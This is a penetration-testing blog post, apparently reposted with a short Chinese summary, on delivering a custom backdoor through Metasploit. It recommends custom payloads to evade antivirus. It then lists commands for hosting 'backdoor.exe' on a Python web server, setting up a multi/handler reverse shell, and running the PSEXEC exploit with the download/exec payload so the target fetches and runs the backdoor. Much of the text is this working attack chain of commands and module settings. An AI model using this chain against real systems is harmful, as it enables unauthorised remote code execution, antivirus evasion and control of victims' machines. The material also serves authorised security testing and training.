Metasploit - Custom Payloads

最新推荐文章于 2024-04-10 16:46:45 发布

Nixawk

最新推荐文章于 2024-04-10 16:46:45 发布

阅读量1.4k

点赞数

分类专栏： Pentesting Metasploit

Pentesting 同时被 2 个专栏收录

160 篇文章

订阅专栏

Metasploit

65 篇文章

订阅专栏

本文详细介绍了如何使用Metasploit创建、部署和执行自定义payload，包括构建payload、设置网站用于下载、配置多用途handler、选择合适的payload类型及参数，并通过PSEXEC进行payload的交付和执行过程。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

You launch your Metasploit exploit. It looks like it is working but no session is created. What happened? Your exploit just got popped by antivirus software. Such a bummer. Antivirus software is a hurdle that you have to overcome as a penetration tester, modeling the techniques of the real-world bad guys. The best way to avoid antivirus software is to stop using a payload that someone else created. Time and time again, penetration testers find they have a basic need to use custom payloads.

Createyour own custom payload, and then you won’t have to worry about an AV signature catching your payload and eating it! It is easy and it gives you the flexibility to go after any target. There are lots of tools and articles for helping you doing so, including the Veil framework.

So you build your own custom payload, now what? How do you operationalize your payload? How do you deliver it to a target and execute it? There are lots of ways to deliver a custom payload, but I’ll cover one of the easiest and most flexible options here.

Metasploit’s Download/Exec Payload is a great option for delivering a custom payload to a target. You can use it with most of Metasploit’s exploits including memory corruption exploits, misconfiguration exploits, and authenticated attacks like PSEXEC. This flexibility means with this Metasploit payload, you can use your custom payload with the Meterpreter.

To use the Download/Exec payload, you will need to do three things. First, you’ll need a website from which the victim can download your custom backdoor. Second, you will need to setup a Metasploit handler to receive the connection from your custom backdoor. Lastly, you’ll need an exploit to deliver your custom payload. Let’s take a look at each of the steps.

A website to provide the “Download” in the Download/Exec payload

You have lots of options for a website to deliver you payloads. Anytime I need a “quick and easy” website I use Python. The first step to staring the Python web server is to change to the directory that contains the files you want to make available for download. Then the command “python —m ‘SimpleHTTPServer’ ” can be used to start a web server. The files in that directory can then be downloaded using any web browser. You can setup this server on any computer that has Python installed. Here, I’ve started a web server listening on port 8000. When the exploit runs you’ll see the download being logged by your web server. Here you can see the victim 10.1.1.170 downloading a copy of “pythonbackdoor.exe”.

[nixawk@core ~]$ python -m 'SimpleHTTPServer' 8000
Serving HTTP on 0.0.0.0 port 8000 ...

Start a handler to receive your shell

Starting the multi/handler requires a few simple commands. First is “use multi/handler”. Next, set your payload to one that is compatible with the custom payload you created. If your payload contains meterpreter then you will “set payload windows/meterpreter/reverse_tcp”. If it is a command prompt then you would type “set payload windows/shell/reverse_tcp”. Since my Python backdoor sends a command prompt, the correct payload here is “windows/shell/reverse_tcp”. This “single” payload doesn’t use a stager and expect a connection from a shell. Do not confuse this with the “windows/shell_reverse_tcp” since “windows/shell_reverse_tcp” is expecting a connection from a stager not a shell. Setting LPORT to 0.0.0.0 will cause Metasploit to listen on all the network addresses on your host. This is a good shortcut from single payloads but it is not a good idea to use this for staged payloads. Some stagers, for example /*/reverse_http, will require that you have an actual routed address so that the stager knows where to download the next stage. Finally, set your LPORT to the port your custom payload is hardcoded to connect to. In this example, my payload is set to send a command prompt to port 80. Finally, you’ll need to start the multi-handler but our work in Metasploit is still not finished. You’ll also need to start your multi-handler as a background task. To do this, the “-j” options to the exploit command will start the multi-handler as a “job” that runs in the background.

msf > use multi/handler
msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 80
LPORT => 80
msf exploit(handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     0.0.0.0          yes       The listen address
   LPORT     80               yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

Exploit the target and deliver the payload

With your handler in the background waiting to receive a connection, you’re ready to exploit the target. Just about any exploit could be used, but remembering my Penetration Tester’s Pledge,I’ll use PSEXEC. First, I use “windows/smb/psexec” and set it up with the correct username and password for the target. Then I set my payload by typing “set PAYLOAD download/exec”. The options are pretty simple. You set the URL to point to the custom payload on the web server that you setup in step 1. You can change the name of the file that will be saved to the target if you like.

msf exploit(psexec) > show options 

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOST                 192.168.1.100    yes       The target address
   RPORT                 445              yes       Set the SMB service port
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             WORKGROUP        no        The Windows domain to use for authentication
   SMBPass               testpass         no        The password for the specified username
   SMBUser               testuser         no        The username to authenticate as


Payload options (windows/download_exec):

   Name      Current Setting                             Required  Description
   ----      ---------------                         --------  -----------
   EXE       backdoor.exe                            yes       Filename to save & run executable on target system
   EXITFUNC  process                                 yes       Exit technique (accepted: seh, thread, process, none)
   URL       http://192.168.1.108:8000/backdoor.exe  yes       The pre-encoded URL to the executable


Exploit target:

   Id  Name
   --  ----
   0   Automatic

When you type “exploit” you will see it download from your website and a shell will appear in your handler. Game On. Let the pivots begin.